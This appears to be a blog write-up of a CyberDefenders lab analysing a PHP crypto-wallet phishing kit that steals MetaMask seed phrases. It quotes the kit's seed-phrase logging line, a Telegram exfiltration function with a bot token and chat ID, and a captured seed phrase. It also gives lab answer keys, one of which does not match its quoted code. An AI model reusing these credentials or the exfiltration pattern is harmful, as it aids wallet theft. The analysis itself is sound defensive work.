a swiss army knife sitting in a box of gold coins

GrabThePhisherLab

CYBERDEFENDERS

5/18/2024

The GrabThePhisherLAb requires the examination of a phishing kit to find the flags.

Scenario

An attacker compromised a server and impersonated https://pancakeswap.finance/, a decentralized exchange native to BNB Chain, to host a phishing kit at https://apankewk.soup.xyz/mainpage.php. The attacker set it as an open directory with the file name "pankewk.zip".

Provided the phishing kit, you as a soc analyst are requested to analyze it and do your threat intel homework.

-------------------------------------------------------------------------

Tools Used

This Lab did not require any Tools and other than a regular text editor, Browser and or terminal

Writeup

  • Question 1: Which wallet is used for asking the seed phrase?

    -> We examinate the Files in the download folder (pass: cyberdefenders.org) and open the index.html. now we can try all the buttons on the left and only one opens a new window -> metamask

    Answer: Metamask

  • Question 2: What is the file name that has the code for the phishing kit?

    -> We have a look at the folders again and see there is a folder called "metamask" so let's check it out. we find the index.html and also another file named "metamask.php" let's open it.

    we see there is comment:

    /*
    With love and respect to all the hustler out there,
    This is a small gift to my brothers,
    All the best with your luck,
    Regards,
    j1j1b1s@m3r0
    */

    Sounds like this file was created by our Threat actor and we have the next flag.

    Answer: metamask.php

  • Question 3: In which language was the kit written?

    -> This one is really simple. the Filename gives us the language and also the first entry: <?php

    Answer: PHP

  • Question 4: What service does the kit use to retrieve the victim's machine information?

    -> Now we have to examine the file. let's look at the first request that is made. It goes to api[.]sypexgeo[.]net and a quick google search reveals: "Sypex Geo - a product for determining the location of a visitor by IP address, from the creators of Sypex Dumper." So this is how the vitims info was retrived.

    Answer: Sypex Geo (mind the space here)

  • Question 4: How many seed phrases were already collected?

    -> Let's go further down to the code for this one. The important part is this one:

    @file_put_contents($_SERVER['DOCUMENT_ROOT'].'/log/'.'log.txt', $text, FILE_APPEND);

    This tells us that there is a log file by the name "log.txt" being created in /log/

    And if we go there we find there are 3 entries.

    Answer: 3

  • Question 6: Write down the seed phrase of the most recent phishing incident?

    -> We just copy the third entry

    Answer: father also recycle embody balance concert mechanic believe owner pair muffin hockey

  • Question 8: What is the token for the channel?

    -> We can backtrack the code to the lines before the one from Question 7:

    function sendTel($message){

    $id = "5442785564";

    $token = "5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10";

    Answer: 5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10

  • Question 9: What is the chat ID of the phisher's channel?

    -> We can backtrack the code to the lines before the one from Question 7:

    function sendTel($message){

    $id = "5442785564";

    $token = "5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10";

    Answer: 442785564

  • Question 10: What are the allies of the phish kit developer?

    -> We go back to the Text I mentioned in Question 2 and check the name

    /*
    With love and respect to all the hustler out there,
    This is a small gift to my brothers,
    All the best with your luck,
    Regards,
    j1j1b1s@m3r0
    */

    Answer: j1j1b1s@m3r0

Profiles

BlueTeamLabs
Online

Socials
Subscribe to My newsletter

This website is non-commercial and does not contain affiliate links, ads or cookies